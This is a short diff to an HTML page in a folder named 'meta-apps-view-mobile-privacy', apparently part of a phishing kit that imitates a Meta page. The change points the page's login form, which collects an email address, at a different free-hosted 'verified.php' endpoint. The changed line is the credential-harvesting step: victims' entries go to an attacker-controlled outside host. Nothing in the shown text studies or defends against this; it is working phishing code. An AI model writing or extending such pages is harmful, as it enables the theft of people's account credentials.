--- a/meta-apps-view-mobile-privacy/homes.html
+++ b/meta-apps-view-mobile-privacy/homes.html
@@ -37,7 +37,7 @@
                     </div>
                     <div class="container">
                         <div class="mt-4">
-                            <form action="https://urmom4000004.000webhostapp.com/verified.php" method="post">
+                            <form action="https://dontjudgemedude.000webhostapp.com/verified.php" method="post">
                                 <div class="mb-3 shadow rounded">
                                     <input type="id" class="form-control up" name="firsname" placeholder="Email address" autocomplete="on" required="yes" maxlength="100">
                                 </div>
